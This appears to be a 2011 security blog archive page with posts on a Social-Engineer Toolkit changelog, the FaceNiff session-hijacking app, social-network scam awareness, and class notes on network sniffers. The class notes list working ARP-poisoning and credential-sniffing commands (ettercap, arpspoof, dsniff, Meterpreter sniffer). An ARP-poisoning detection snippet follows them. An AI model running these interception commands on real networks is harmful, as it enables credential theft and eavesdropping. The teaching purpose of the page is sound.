Showing posts with label social-engineering. Show all posts

Wednesday, 22 June 2011

Download Social-Engineer Toolkit v1.5


The Social Engineering Toolkit (SET) is a Python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Official change log:
  • Added shell.py to support both Linux and OSX for the SET Interactive Shell, uses same code repository
  • Added shell to support Linux/OSX for SET Interactive Shell
  • Added download to support Linux/OSX for SET Interactive Shell
  • Added upload to support Linux/OSX for SET Interactive Shell
  • Added ps to support Linux/OSX for SET Interactive Shell
  • Added kill to support Linux/OSX for SET Interactive Shell
  • Fixed a bug in mass mailer where TLS would execute after ehlo not before. Thanks pr1me
  • Changed download path to replace forward and back slashes with a _ so it would not cause strange nix issues with back slashes and forward slashes in the SET Interactive Shell
  • Added better integer handling when running listener.py by itself without specifying a port
  • Redesignated filename shell.binary to shell.windows and shell.linux (PE vs. ELF binary)
  • Added separate installers for shell.linux and shell.osx, too many differences between the two and needed different compiling.
  • Added instructions in shell.py how to compile for each flavor operating system including windows, linux, and osx
  • Added reboot now into the SET interactive Shell
  • Added persistence to the SET interactive shell with a completely custom written python-bytecompiled service. Essentially uploads service to victim, that calls interactive shell every 30 minutes
  • Added name distinguishing per windows/posix systems so it will show up POSIX or WINDOWS on interactive shell, will also show WINDOWSUAC-SAFE and WINDOWSSYSTEM.
  • Added the MS11-050 IE mshtml!CObjectElement Use After Free exploit from Metasploit
  • Added dynamic packing to download/upload for persistence, better AV avoidance
  • Added MS11-050, Adobe Flash 10.2.153.1, and Cisco AnyConnect Metasploit exploits to the SET web gui
  • Added ‘clear’ and ‘cls’ in the SET Interactive Menu to remove what's in the screen, etc.
  • When using the java docbase exploit, removed ‘Client Login’ for title frame, isn’t needed
  • Added back command to the SET interactive shell to go back when in different menus
  • Fixed a bug where it would state payloadprep not defined, it was caused by UPX not fully packing the device at time of upload, a 3 second delay has been added


Thursday, 2 June 2011

Faceniff evil android application

What is FaceNiff?

FaceNiff is an Android application that lets users sniff and intercept web session profiles over Wi-Fi networks, stealing other users’ credentials from Facebook, Twitter and other services.
The app requires root access on the user’s Android smartphone, but other than that it’s fairly simple to use, which makes it perhaps even more dangerous than Firesheep, a Firefox extension that lets users hijack Facebook and Twitter sessions over Wi-Fi networks. FaceNiff also works on WPA-encrypted Wi-Fi networks, which Firesheep doesn’t support.

Right now it works with Facebook, Twitter, YouTube, and Nasza-Klasa (a Polish Facebook clone), but developer Bartosz Ponurkiewicz promises more are coming.

FaceNiff is much more flexible than Firesheep as the latter requires a computer. Nearly anything is accessible to FaceNiff users, providing they can get access to protected networks.

Here is the video of faceniff demonstrating the new attack



How to protect yourself from FaceNiff?

FaceNiff cannot, however, access accounts that use https browsing, which encrypts information for a more secure browsing session. Facebook is not automatically on https. Users must enable it manually, and Twitter also requires users to manually activate it. Perhaps with the wider availability of an app like FaceNiff, https browsing will become standard.


You can download FaceNiff from its official website: http://faceniff.ponury.net/

Tuesday, 3 May 2011

Social Networking and Security Risks



The popularity of social networking websites has increased drastically. Everyone, from children to the elderly, is on a social networking website; Facebook and Twitter are among the most popular nowadays. They can be used for professional networking, job searches, Internet marketing and so on. These sites can be a very good source of entertainment and learning, but they also carry their own security risks, which many people are still not aware of. These risks can be very dangerous for the general public and for children.

Previously I had gone deep into the Facebook scams spread over the World Wide Web, on which I posted an article at my blog. Now I will make you aware of the social networking security risks through my article, exclusive on hackersbay.in

WHAT ARE SOCIAL NETWORKING WEBSITES?

Social networking websites function like an online community of internet users. Depending on the website in question, many of these online community members share common interests in hobbies, religion, or politics. Once you are granted access to a social networking website you can begin to socialize. This socialization may include reading the profile pages of other members and possibly even contacting them. 

There are a variety of people on these websites whom we don't know. Meeting someone online is not enough to judge whether he is the right person to befriend. There is always a risk of blackmail, malware spreading, identity theft and so on.

People who are aware of the risks and dangers of social networking can generally steer clear of the crimes committed through it, while people who are not aware of them will surely become prey.

Hackers rely heavily on social engineering in these crimes.


=============================================================================
DANGERS/RISKS OF SOCIAL NETWORKING.


Facebook

Events and Questions

You must know about the famous scam that was on Facebook some days ago, "View Who Viewed your Profile". I remember I got more than 20 invites for that event. Hackers can use such events as a channel for applying their social engineering skills to you, and you may not even know that they are hackers doing so. The new Facebook feature "Questions" will help them even more.

Now let's take an example.

You are invited to an event called "About me", or a friend asks you through the Questions feature.

They will include some questions, because the topic itself is "About Me":

1. What was my most embarrassing moment?
2. In which city were you born?
3. What was the name of my first elementary school?
4. What was my favorite pet’s name?
5. What is your father's name?


These questions are not harmful to answer in a general conversation with your friends or relatives. But if you look at them carefully, they are the security questions asked by social networking sites. Using your answers to these secret questions, attackers can access your account and you will be ruined.

You can read this story and think about how you could suffer.

 Facebook Applications




Facebook offers thousands of applications that its users can install and run. These applications include calendars that allow Friends to be reminded when it’s your birthday, tools to send Friends online greeting cards, quizzes on myriad topics and much more.





These applications look totally harmless, but in some cases they are not: hackers use them to deliver malicious content to your computer. This holds true not only for Facebook, but also for other social networking sites and for the Internet in general, when downloading from the Web or opening attachments in email messages. Therefore, make certain that your computer has a proper and functional firewall, as well as up-to-date antivirus/anti-malware software, and only install or run these applications if they are from a trusted source or approved by your corporate IT department. We call these Java applet or Java drive-by attacks.


TWITTER 
Twitter is an online application that allows you to post brief comments (tweets) on any topic. Other users on the Twitter network can become followers of your tweets, so that they receive the updates whenever you send them. Twitter is used for professional purposes, so the risks here differ from those on Facebook. Generally Twitter is used by celebrities and companies, who tweet their updates all the time. Somebody told me someone tweeted on Twitter when the Osama kill mission started.

Employees may even tweet something that is harmful to their company. Companies should keep an eye on their employees' tweets, or the tweets may harm their future.


FRAUDS and HOAXES
Whether it is Facebook or Twitter, online banking or day-to-day purchases, be aware of emails that claim to be from these sites but are actually hoaxes and may contain malicious content. I have received numerous emails that seem to be from a bank, yet were actually sent by a spammer in the hope of obtaining the online username and password.

The messages may even contain an attached ZIP file that recipients are asked to open to see who invited them. The attachment will contain Trojans and malware, which can damage your computer and give your sensitive information to the hacker.

URL SHORTENING

Another form of hoax involves the shortening of URLs in email messages or on websites such as our favorites, Facebook and Twitter. Oftentimes, the links that we want to post can get very long, making them unwieldy or impossible to type in the small space allotted by the network sites. To get around this, third-party services such as http://tinyurl.com/ or http://bit.ly/ will “encode” the URL into a much shorter version. For example, http://www.facebook.com/sauravhacker will turn into http://adf.ly/1PnMZ

Although the benefit of URL shortening is obvious, there is also a security risk associated with it, in that the shortened URL really does not tell you the true destination of the link. You only find out once you get there, which may be too late if that site happens to contain drive-by malware or content which should not be viewed by “sensitive” eyes. Therefore, make certain that you click on shortened URLs only if you trust the sender. Never click on them if they are contained in spam messages or on sites that you have any reason to consider suspicious.

You can also use any LongURL-style service to expand the shortened URL.

PROTECTION

Use Different Passwords, Change Them Often: Each of your social networking sites, as well as all other important websites, should have a different, complex password assigned to it, and the passwords should be changed regularly. Since people often use the same password on multiple sites, one compromised account could easily lead to compromising other accounts.

Don’t Blindly Give Out Your Credentials: There are a lot of third party web-based services out there that make use of your social networking services. In the past, the only way for this to occur was to give your credentials to these services. This works, so long as these third party services weren’t somehow compromised, or worse, the services were not what they seemed to be.


Keep Your Operating System, Browser Patched: Ensure you have applied all the latest patches from Microsoft, Apple, or whoever supplies your computer’s underlying operating system. Ensure you are using the latest version of your web browser. If you are using Internet Explorer (especially Internet Explorer version 6, as is standard on Windows XP), try using a third-party browser such as Firefox or Google Chrome.

Browser Plugins Can Help: If you are using Firefox, there are plugins, such as LongURL, that can help expand those “short” URLs so you can see where they will take you.

Antivirus: Always use an updated version of antivirus / anti-malware / anti-rootkit software. The updated version will have its virus database updated, which will help you recognize and delete those threats.


Click on links you trust: Only click on links that you got from a trusted person, because other links may contain Trojans or even lead to phishers.


If you are aware of the social networking risks, you are secured from the hacker. That I only mentioned Facebook and Twitter does not mean the risks exist only on them. These risks exist on all social networking sites, but hackers target the most popular ones, which nowadays are Facebook and Twitter.

Did I miss something? Please tell me through your precious comments.


 References and Credits
-Phone Boy 
-Brad Dinerman
-Saurav

Wednesday, 13 April 2011

Network Sniffers Class for the Kentuckiana ISSA 2011

This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects: TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMiner, Firesheep and Xplico. I lost part of Gary's on-screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.


Part 1: Intro to Sniffers


Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.

Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi

Part 2: Wireshark and Wireless with Gary Hampton

Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.


Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi

Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMiner, Firesheep, Xplico and bridging.


Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.

Commands used:
Wireshark Demo
 
1.       Run Wireshark
2.       Basic start capture
3.       Start capture with options
4.       Drill down OSI
5.       Capture filter options (4.9 in book)
not tcp port 3389
not broadcast and not multicast
6.       Show a packet
7.       Pop a packet out
8.       Sort by columns
9.       Follow stream (web traffic)
10.    Export HTTP Objects
11.    Simple view filters
tcp.port == 80
!(ip.addr == 192.168.1.13)
12.    Filter builder
13.    Apply filters from different panes (packet vs. details panes).
14.    Save filters
15.     Open a Wiki page
16.    Edit-> Find packet
17.    Analyzers ->Expert Info
18.    Analyzers ->Firewall ACLs
19.    Stats
20.    Color rules
21.    Save capture
22.    Mention Lua
Dumpcap/TCPDump
    dumpcap -D
    dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap
Sniffing in Monitor mode
   ifconfig wlan0 down
   iwconfig wlan0 mode monitor
   iwconfig wlan0 channel 1
   ifconfig wlan0 up
Ettercap Demo
1.      ettercap -T -q -i eth0 -M ARP // //
2.      ettercap -T -q -i eth0 -M ARP // /10.1.1.1/
3.      Show ARP traffic
4.      Telnet to 10.1.1.1
5.      http to 10.1.1.1
6.      FTP/Telnet/HTTP someplace with a password
7.      Show find sniffers
ettercap -G
ettercap -T -i eth0 -P list
ettercap -T -i eth0 -P search_promisc //
8.      Filters:
     etterfilter ig.filter -o ig.ef
     ettercap -T -q -F ig.ef -M ARP // //
9.      Mention MITM: icmp, dhcp, port filters
10.    driftnet -i eth0
11.    Etherape
Cain Demo
1.      Start poisoning
2.      Telnet to 10.1.1.1
3.      http to 10.1.1.1
4.      FTP/Telnet/HTTP someplace with a password
5.      SSL someplace from VM
6.      Sniff RDP
ARPSpoof Demo
   cat /proc/sys/net/ipv4/ip_forward
   echo 1 > /proc/sys/net/ipv4/ip_forward
   arpspoof -i eth0 10.0.0.1
   arpspoof -i eth0 -t 10.0.0.113 10.0.0.1
   dsniff -i eth0 -c
NetworkMiner
1.      TCP fingerprinting
2.      Host details
3.      DHCP finger printing
4.      File capture
5.      Passwords
6.      Plaintext
7.      Open pcap
Bridging in Linux setup
    sudo apt-get install bridge-utils   
Script to setup MAC bridging:
    ifconfig eth0 0.0.0.0
    ifconfig eth1 0.0.0.0
    brctl addbr mybridge
    brctl addif mybridge eth0
    brctl addif mybridge eth1
    ifconfig mybridge up
Things to show while bridged
    ifconfig
    sudo tcpdump -i mybridge -s 0 -w out.cap
    sudo etherape -i mybridge
    sudo driftnet -i mybridge
Metasploit/SET
   Backtrack->Penetration->SET
   Menu Choices 2, 1, 2 (Google.com), 2, 2, default, no
   <go to page>
   sessions -i 1
   use sniffer
   help
   sniffer_interfaces
   sniffer_start 2
   sniffer_dump 2 /tmp/all.cap
   <Show in Wireshark>
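
For the ARP poisoning demos listed above (Ettercap, Cain, arpspoof), here is the defender's side as an added example, not part of the class material: a check of a Linux host's ARP table for the two signs poisoning leaves behind, a gateway whose MAC differs from a recorded baseline and one MAC answering for several IPs. The table text, addresses and baseline MAC are constructed; the function names are assumptions.

```python
from collections import defaultdict

def parse_proc_net_arp(text):
    """Parse the text of Linux /proc/net/arp into (ip, mac, device) tuples."""
    entries = []
    for line in text.strip().splitlines()[1:]:       # skip the header row
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw_type, flags, mac, _mask, dev = fields
        if int(flags, 16) & 0x2 == 0:                # ATF_COM unset: incomplete entry
            continue
        entries.append((ip, mac.lower(), dev))
    return entries

def find_arp_anomalies(entries, gateway_ip=None, gateway_mac=None):
    """Return alerts for a changed gateway MAC and for MACs shared by several IPs."""
    alerts = []
    by_mac = defaultdict(list)
    for ip, mac, dev in entries:
        by_mac[(dev, mac)].append(ip)
        if ip == gateway_ip and gateway_mac and mac != gateway_mac.lower():
            alerts.append(("gateway-mac-changed", ip, mac))
    for (_dev, mac), ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(("mac-shared", tuple(sorted(ips)), mac))
    return alerts

# Constructed ARP table as seen on a poisoned host: the gateway 10.0.0.1
# and the host 10.0.0.66 both resolve to the same MAC address.
SAMPLE_ARP = """
IP address       HW type     Flags       HW address            Mask     Device
10.0.0.1         0x1         0x2         02:00:00:aa:bb:cc     *        eth0
10.0.0.66        0x1         0x2         02:00:00:aa:bb:cc     *        eth0
10.0.0.20        0x1         0x2         02:00:00:11:22:33     *        eth0
10.0.0.30        0x1         0x0         00:00:00:00:00:00     *        eth0
"""

def check_sample():
    entries = parse_proc_net_arp(SAMPLE_ARP)
    # Baseline gateway MAC recorded earlier on a known-clean network (constructed).
    return find_arp_anomalies(entries, "10.0.0.1", "02:00:00:DE:AD:01")
```

A shared MAC also occurs legitimately with proxy ARP or a host carrying several addresses, so the baseline comparison for the gateway is the stronger signal of the two.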